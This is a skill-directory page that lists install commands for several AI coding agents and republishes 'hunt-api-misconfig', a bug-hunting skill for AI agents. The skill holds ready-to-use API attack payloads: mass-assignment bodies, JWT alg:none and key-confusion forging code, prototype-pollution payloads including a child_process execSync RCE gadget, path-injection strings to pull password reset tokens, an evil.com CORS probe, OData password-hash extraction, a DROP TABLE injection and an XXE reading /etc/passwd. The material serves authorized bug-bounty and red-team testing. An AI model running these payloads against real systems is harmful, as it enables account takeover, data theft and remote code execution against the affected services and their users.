Auth Bypass
NeoTheCapt/RedteamAgent
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Hunt API security misconfiguration — mass assignment, prototype pollution, HTTP verb tampering.
$ npx skills add elementalsouls/Claude-BugHunter --skill hunt-api-misconfig -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install elementalsouls/Claude-BugHunter hunt-api-misconfig --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt-api-misconfig .claude/skills/hunt-api-misconfig && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "hunt-api-misconfig" agent skill from https://github.com/elementalsouls/Claude-BugHunter/tree/main/skills/hunt-api-misconfig into .claude/skills/hunt-api-misconfig/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-api-misconfig", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/elementalsouls/Claude-BugHunter/tree/main/skills/hunt-api-misconfigType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add elementalsouls/Claude-BugHunter --skill hunt-api-misconfig -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install elementalsouls/Claude-BugHunter hunt-api-misconfig --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/hunt-api-misconfig .agents/skills/hunt-api-misconfig && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "hunt-api-misconfig" agent skill from https://github.com/elementalsouls/Claude-BugHunter/tree/main/skills/hunt-api-misconfig into .agents/skills/hunt-api-misconfig/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-api-misconfig", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add elementalsouls/Claude-BugHunter --skill hunt-api-misconfig -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install elementalsouls/Claude-BugHunter hunt-api-misconfig --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/hunt-api-misconfig .cursor/skills/hunt-api-misconfig && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "hunt-api-misconfig" agent skill from https://github.com/elementalsouls/Claude-BugHunter/tree/main/skills/hunt-api-misconfig into .cursor/skills/hunt-api-misconfig/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-api-misconfig", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/elementalsouls/Claude-BugHunter.git --path skills/hunt-api-misconfig--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add elementalsouls/Claude-BugHunter --skill hunt-api-misconfig -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install elementalsouls/Claude-BugHunter hunt-api-misconfig --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/hunt-api-misconfig .gemini/skills/hunt-api-misconfig && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "hunt-api-misconfig" agent skill from https://github.com/elementalsouls/Claude-BugHunter/tree/main/skills/hunt-api-misconfig into .gemini/skills/hunt-api-misconfig/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-api-misconfig", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install elementalsouls/Claude-BugHunter hunt-api-misconfigInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add elementalsouls/Claude-BugHunter --skill hunt-api-misconfig -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/hunt-api-misconfig .github/skills/hunt-api-misconfig && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "hunt-api-misconfig" agent skill from https://github.com/elementalsouls/Claude-BugHunter/tree/main/skills/hunt-api-misconfig into .github/skills/hunt-api-misconfig/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-api-misconfig", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add elementalsouls/Claude-BugHunter --skill hunt-api-misconfig -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install elementalsouls/Claude-BugHunter hunt-api-misconfig --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/hunt-api-misconfig .opencode/skills/hunt-api-misconfig && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "hunt-api-misconfig" agent skill from https://github.com/elementalsouls/Claude-BugHunter/tree/main/skills/hunt-api-misconfig into .opencode/skills/hunt-api-misconfig/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-api-misconfig", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
hunt-api-misconfigHunt API security misconfiguration — mass assignment, prototype pollution, HTTP verb tampering.
Hunt API Misconfig is an agent skill from elementalsouls/Claude-BugHunter. Hunt API security misconfiguration — mass assignment, prototype pollution, HTTP verb tampering. Mass assignment: send {isadmin:true, role:admin, verified:true} on profile/account/reset endpoints — server blindly applies. JWT signature/crypto forging (alg:none, key confusion, kid/jku) is owned by hunt-jwt-crypto; this skill covers only non-crypto JWT handling. Prototype pollution: proto injection in JSON merge / Object.assign / lodash .merge → polluted prototype reaches sink (RCE in Node, XSS in browser). HTTP…
Its SKILL.md is about 4.5k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Backend & APIs, covering Web application vulnerabilities and Authentication. The repository describes itself as: A Claude Code skill bundle for bug hunting and external red-team work - 82 skills, 15 slash commands, 681 disclosed-report patterns curated across 24 core vulnerability classes… The licence is MIT.
5 steps, taken from the first numbered list in SKILL.md.
Read from SKILL.md and the folder at commit b0957e6. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
jqcurlFrom the folder's file list and the shell code blocks in SKILL.md.
Links to these hosts (documentation or services it may open):
github.comstratussecurity.comthehackernews.comf5.comarxiv.orgowasp.orgupguard.comhackerone.comblog.vidocsecurity.comportswigger.netcloudsek.comFrom URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Hunt API Misconfig loads about 4.5k tokens when it runs. Until then it costs about 225 tokens; SKILL.md has 1,617 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from elementalsouls/Claude-BugHunter at commit b0957e6, republished under its MIT licence (© elementalsouls). 1,617 words, ~4,465 tokens.
.claude/skills/hunt-api-misconfig/SKILL.md (or your agent's skills folder).User.update(req.body) // body has {"role": "admin"} → privilege escalationheader = {"alg": "none", "typ": "JWT"}
payload = {"sub": 1, "role": "admin"}
token = base64(header) + "." + base64(payload) + "." # no signature# Get server's public key from /.well-known/jwks.json
# Sign token with public key as HMAC secret
token = jwt.encode({"sub": "admin", "role": "admin"}, pub_key, algorithm="HS256")
# Server uses RS256 key as HS256 secret → accepts it// Server-side — Node.js merge without protection
{"__proto__": {"admin": true}}
{"constructor": {"prototype": {"admin": true}}}
// URL: ?__proto__[isAdmin]=true&__proto__[role]=superadminFor server-side prototype pollution, hunt for an object merge primitive first, then a sink. Favor
JSON/object update endpoints such as profile, address, preferences, settings, cart, admin job, import,
or webhook configuration. Do not stop at a 200 response to __proto__; prove that polluted prototype
state reaches a later operation.
Hunt sequence:
{"__proto__":{"polluted":"pp-1337"}}
{"constructor":{"prototype":{"polluted":"pp-1337"}}}
__proto__[polluted]=pp-1337
constructor[prototype][polluted]=pp-1337{"__proto__":{"json spaces":10}}
{"__proto__":{"status":555}}
{"__proto__":{"isAdmin":true,"role":"admin"}}
{"__proto__":{"shell":"/bin/bash","argv0":"node","NODE_OPTIONS":"--inspect"}}
{"__proto__":{"execArgv":["--eval","process.mainModule.require('child_process').execSync('id')"]}}Use this when a frontend form or endpoint appears to call a server-side API on your behalf (password reset, account lookup, profile fetch, product lookup, stock check, search). The bug is not ordinary client-side query pollution. The server takes your input and interpolates it into a backend URL path or query string, such as:
/api/internal/users/<username>/field/email
/api/users/<id>
/api/users?username=<username>&field=emailHunt sequence:
fetch(...), hidden CSRF fields, and the exact parameter name the browser sends.
If there is a reset/account form, test known usernames first to learn the normal success/error shape.#, ?, &x=y, /, ../, and encoded forms %23, %3f, %26x=y, %2f, %2e%2e%2f.
Distinct errors such as Invalid route, API definition, unsupported field, or changed returned
fields mean your value is being interpreted by a server-side URL router, not merely validated as text.username/../other-user changes the
referenced account, the input is in a REST path segment. Then try appending route fragments such as
/field/email, /field/id, /field/username, /field/passwordResetToken, and terminate the rest
of the original backend path with # or %23 when the backend URL parser honors fragments./openapi.json, /swagger.json, /api-docs, /api/swagger.json,
/swagger/v1/swagger.json, /v3/api-docs, and path-traversal variants that attempt to reach the
spec from the vulnerable backend route. A spec or descriptive route error tells you valid resources
and field names.Invalid route; use errors as routing
feedback.Payload patterns to try, adapted to the observed parameter name:
username=administrator%23
username=administrator%3f
username=administrator%2f..%2fvictimuser
username=administrator/../victimuser
username=administrator/field/email%23
username=administrator/field/id%23
username=administrator/field/passwordResetToken%23
username=administrator%2ffield%2fpasswordResetToken%23# Test: reflected origin + credentials
curl -s -I -H "Origin: https://evil.com" https://target.com/api/user/me
# If: Access-Control-Allow-Origin: https://evil.com + Access-Control-Allow-Credentials: true
# → CRITICAL: attacker reads credentialed responsesOData (Open Data Protocol) is the query layer behind SharePoint, Microsoft Dynamics 365 / Power Platform, SAP NetWeaver Gateway / Fiori, and any ASP.NET WebAPI project using Microsoft.AspNetCore.OData. It exposes SQL-shaped query operators (eq, ne, and, or, substringof, startswith, tolower, concat, replace) that look SQL-ish but are NOT SQL — meaning keyword-blacklist WAFs routinely fail open on OData traffic.
startswith / substringofGET /_api/data/contacts?$filter=startswith(adx_identity_passwordhash,'a')
GET /_api/data/contacts?$filter=startswith(adx_identity_passwordhash,'aa')Iterate prefix character-by-character; cardinality of the response (or @odata.count) is the boolean oracle that confirms the prefix is correct. No SQLi engine needed, no '/-- characters — the WAF sees only legitimate OData keywords. Extracted Microsoft Dynamics 365 / Power Apps Portals password hashes, names, emails, addresses, financial data in Dec 2023; Microsoft patched May 2024. (Stratus Security writeup, The Hacker News coverage Jan 2025)
$orderby / $select column-disclosure bypassGET /api/data/v9.0/contacts?$orderby=emailaddress1 desc&$select=fullname$orderby accepts column names the user has no $select permission for, but the engine still sorts on them — the returned order leaks the protected column. Column-level ACLs are enforced on the projection ($select) but NOT on $orderby / $filter — same protected column, different code path. Second Stratus finding in the same Dynamics 365 disclosure; "more dangerous than the first because it directly returned the data" per Stratus.
$batch multipart/mixed → per-request WAF signatures miss sub-operationsPOST /odata/$batch Content-Type: multipart/mixed; boundary=batch_1
--batch_1
Content-Type: application/http
GET Users?$filter=1 eq 1 HTTP/1.1
--batch_1--WAFs that scan only the outer request body (or that don't natively parse multipart/mixed) skip every inner operation. ModSecurity refused multipart/mixed historically (Issue #3296); F5 added native batch parsing only in Advanced WAF v16.1 (F5 SAP-Fiori advisory). The 2025 WAFFLED paper (arXiv 2503.10846) generalises the parsing-discrepancy bypass class across 5 major WAFs.
GET /api?%24filter=Name%20eq%20'x'%20or%201%20eq%201 # URL-encoded $
GET /api?%2524filter=... # double-encoded
GET /Users(1)/$value # path-segment styleMixed-case operators (Eq, EQ) and obscure ones (substringof, tolower, concat, replace) look unlike SELECT/UNION so SQLi-keyword signatures never fire. WAFs that key on the literal string $filter see neither form — but the OData server normalises both before evaluating the predicate. Documented since Kalra Black Hat AD 2012; canonical OData-vs-WAF impedance mismatch. (OWASP Double Encoding)
$filter=Name eq 'x'); DROP TABLE Users--'Only triggers when the OData layer string-concatenates into SQL instead of using LINQ. Documented in OData/WebApi Issue #2352. The XML-deserialisation variant: CVE-2019-17554 (Apache Olingo OData 4.0.0-4.6.0, XXE via <!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]> in application/xml body, CVSS 7.5). DoS variant: CVE-2018-8269 (Microsoft.Data.OData deep $filter recursion → stack overflow).
$expand navigation-property IDORGET /Orders?$expand=Customer($expand=PaymentMethods($expand=Card))Authorisation decorators applied to top-level entity sets; the engine joins along navigation properties without re-checking ACL on the joined entity. Same root cause as the 2021 PowerApps Portals 38M-record mass leak (UpGuard writeup).
OData-Version: 4.0 / DataServiceVersion: 3.0; URL paths /_api/, /odata/, /_vti_bin/, /api/data/v9.x/, /sap/opu/odata/.$metadata → if anonymous, the full schema (entity sets, navigation properties, function imports) is yours.$filter=1 eq 1, $top=1, $select=*, then $orderby=<column-you-shouldnt-see> for column-level ACL.$filter=, %24filter=, %2524filter=) and through $batch — divergent WAF behaviour confirms the parser-discrepancy bug.NSwag is the Swagger/OpenAPI toolchain for ASP.NET Core. Default routes (/swagger, /swagger/v1/swagger.json, /swagger/index.html) ship enabled in many .NET 6/7/8 projects and developers leave them on in production. The exposed spec discloses every endpoint, HTTP methods, parameter names + types + formats + max-lengths, models, validation rules — a complete attack-map in JSON.
web2-recon)# NSwag / Swashbuckle (ASP.NET Core)
/swagger, /swagger/index.html, /swagger/v1/swagger.json, /swagger/v2/swagger.json, /swagger/v3/swagger.json
/swagger-ui, /swagger-ui/, /swagger-ui.html, /api-docs
/nswag, /nswag/index.html, /api/swagger, /api/swagger.json, /api/openapi.json
# Generic OpenAPI
/openapi, /openapi.json, /openapi.yaml, /.well-known/openapi.json
# Java / Spring (Springfox / springdoc)
/v2/api-docs, /v3/api-docs, /v3/api-docs.yaml, /swagger-resources
# Python (FastAPI / Connexion)
/docs, /redoc, /openapi.json
# Quarkus
/q/openapi, /q/swagger-ui
# GraphQL adjacent
/graphql, /graphiql, /playground, /altair, /voyagerTools: kiterunner natively eats OpenAPI; sj (Swagger Jacker), apidetector, XSSwagger.
A. Spec disclosure → mass IDOR / BOLA. Spec lists every GET /api/v1/users/{userId}/.... jq '.paths | keys' swagger.json → swap {userId} for victim's ID via Autorize/ffuf -mc 200. Common case: spec leaks /api/admin/users/{id}/reset-password documented but missing [Authorize(Roles="Admin")] on the controller — low-priv ATO.
B. Spec disclosure → mass-assignment payload construction. components.schemas.UserUpdateDto enumerates every model field including isAdmin, emailVerified, tenantId, role. Attacker copies the schema verbatim into PATCH /users/me and adds the privileged fields. Server's [FromBody] binder accepts them when DTOs aren't split into read-vs-write models.
C. Hidden endpoints. Specs document /internal/*, /debug/*, /v0/*, /legacy/* routes that no front-end UI references. Reachable but uncovered by WAF rules and often skipped during auth reviews.
D. Swagger UI configUrl takeover. Swagger UI loads its config from ?configUrl=. If unsanitised, attacker hosts an evil OpenAPI spec, sends victim a link to the legitimate Swagger UI with ?configUrl=https://evil/spec.json. Spec routes point back at the legitimate origin so the victim's "Try It Out" clicks fire same-origin authenticated requests. (HackerOne #3124103 — U.S. DoD Swagger UI Injection, May 2025)
url= parameter.swagger-ui to invoke a verified-business WhatsApp send-message endpoint, impersonating the company to its customers. 6,000+ exposed Swagger UI instances on Shodan at time of writing. (CloudSEK report)rswag (Ruby Swagger toolchain) directory traversal — reminder that the spec endpoint is itself an attack surface.Content-Type: application/json AND body matching "swagger" or "openapi".jq '.paths | keys' swagger.json → feed to kiterunner / Autorize.jq '.components.schemas' swagger.json → mass-assignment field candidates.?configUrl= and ?url= parameter handling on every Swagger UI hit.hunt-ato — Mass assignment on signup/profile is the fastest path to admin. Chain primitive: API mass assignment + hunt-ato → role=admin set on signup → ATO via privileged role on first login.hunt-auth-bypass — JWT flaws collapse the entire auth layer. Chain primitive: JWT alg=none + hunt-auth-bypass → impersonate any user by setting sub to victim ID, no signature required.hunt-rce — Prototype pollution gadgets in Node.js dependencies (lodash, mongoose, jQuery) reach child_process.spawn. Chain primitive: Prototype pollution (__proto__.shell=true) + hunt-rce (Node.js gadget chain) → RCE on the API node.hunt-subdomain — CORS regex with wildcard subdomain trusts a takeoverable host. Chain primitive: CORS allowlist *.target.com + subdomain takeover → attacker-controlled origin reads credentialed API responses.security-arsenal — Load the JWT Attack Payloads section (alg=none, kid path traversal, JWK injection, embedded JWK) and the Mass-Assignment Field Wordlist (is_admin, role, verified, permissions, org_id, tenant_id).triage-validation — Apply the Server-Policy-vs-State gate: a permissive CORS header alone is informational; demonstrate actual cross-origin credentialed read of sensitive data before reporting.© elementalsouls, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/hunt-api-misconfig of elementalsouls/Claude-BugHunter.
Open the folder on GitHubat commit b0957e6
Hunt API Misconfig next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Hunt API Misconfig this skillelementalsouls/Claude-BugHunter | 4.8k | — | ~4.5k | Automated safety check: Pass | MIT | |
| Auth BypassNeoTheCapt/RedteamAgent | 140 | — | ~1.3k | Automated safety check: Pass | None | |
| API Security Designvinayaklatthe/microsoft-security-skills | 175 | — | ~2.2k | Automated safety check: Pass | MIT | |
| Django Securityaffaan-m/ECC | 274k | 5 repos | ~4k | Automated safety check: Notes | MIT | |
| Django Securityaffaan-m/ECC | 274k | 1 repos | ~4.3k | Automated safety check: Notes | MIT | |
| Web Ssrfs0ld13rr/pentestcode | 817 | — | ~660 | Automated safety check: Warn | MIT |
NeoTheCapt/RedteamAgent
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
vinayaklatthe/microsoft-security-skills
Guidance for designing secure APIs on Azure - authentication, authorization, gateway controls, input validation, rate limiting, secret management, and runtime threat detection - aligned to OWASP API…
affaan-m/ECC
Django security best practices, authentication, authorization, CSRF protection, SQL injection prevention, XSS prevention, and secure deployment configurations.
affaan-m/ECC
Django security best practices, authentication, authorization, CSRF protection, SQL injection prevention, XSS prevention, and secure deployment configurations.
s0ld13rr/pentestcode
Server-Side Request Forgery detection→internal-access→proof for web apps.
jamditis/claude-skills-journalism
Secure authentication patterns (OWASP, NIST). An agent skill from jamditis/claude-skills-journalism.
elementalsouls/Claude-BugHunter
Hunt account takeover taxonomy — 9 distinct paths to ATO, plus chains.
elementalsouls/Claude-BugHunter
Hunt fintech-specific GraphQL vulnerabilities: money-movement mutations (transfers, redemptions, withdrawals, card top-ups), ledger/balance/portfolio query IDOR, decimal-precision and rounding…
elementalsouls/Claude-BugHunter
Hunt HTTP request smuggling (CL.TE, TE.CL, H2.CL, H2.TE). An agent skill from elementalsouls/Claude-BugHunter.
elementalsouls/Claude-BugHunter
Hunt JWT cryptographic failures — alg:none signature-stripping and RS256→HS256 key-confusion that let an attacker forge a token for any identity (e.g.
elementalsouls/Claude-BugHunter
Hunt vector-store / embedding-layer weaknesses in RAG pipelines (OWASP LLM08 Vector and Embedding Weaknesses) — persistent corpus poisoning that survives across sessions and users (distinct from…
elementalsouls/Claude-BugHunter
Discover a single-page-app's hidden backend API from its public JS bundle, then test that API for broken access control / missing authentication.
Categories
Hunt API security misconfiguration — mass assignment, prototype pollution, HTTP verb tampering. Hunt API Misconfig is an agent skill from elementalsouls/Claude-BugHunter. Hunt API security misconfiguration — mass assignment, prototype pollution, HTTP verb tampering.
Hunt API Misconfig fits situations like: hunting API misconfigs; mass-assignment; prototype pollution (JWT crypto → hunt-jwt-crypto).
Run `npx skills add elementalsouls/Claude-BugHunter --skill hunt-api-misconfig -a claude-code`. Or copy the skill folder (skills/hunt-api-misconfig in elementalsouls/Claude-BugHunter) into .claude/skills/hunt-api-misconfig in your project. Claude Code loads it when a task matches its description.
Run `npx skills add elementalsouls/Claude-BugHunter --skill hunt-api-misconfig -a codex`. Or copy the skill folder (skills/hunt-api-misconfig in elementalsouls/Claude-BugHunter) into .agents/skills/hunt-api-misconfig in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add elementalsouls/Claude-BugHunter --skill hunt-api-misconfig -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-api-misconfig, .gemini/skills/hunt-api-misconfig, .github/skills/hunt-api-misconfig and .opencode/skills/hunt-api-misconfig in your project.
Going by SKILL.md and its folder, Hunt API Misconfig needs the command-line tools its instructions call (jq and curl). Our summary lists: Python 3; Node.js.
SKILL.md names 11 domains. As links in the text: github.com, stratussecurity.com, thehackernews.com, f5.com, arxiv.org, owasp.org, upguard.com, hackerone.com, blog.vidocsecurity.com, portswigger.net and cloudsek.com. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Hunt API Misconfig is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 4.5k tokens (SKILL.md is roughly 18k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Hunt API Misconfig: Auth Bypass (NeoTheCapt/RedteamAgent, 140 stars), API Security Design (vinayaklatthe/microsoft-security-skills, 175 stars), Django Security (affaan-m/ECC, 274k stars) and Django Security (affaan-m/ECC, 274k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
elementalsouls (a GitHub user) maintains it in elementalsouls/Claude-BugHunter, which has 4,783 GitHub stars. The repository holds 17 skills in this directory. The repository was last updated on October 6, 2026.
Source: elementalsouls/Claude-BugHunter on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.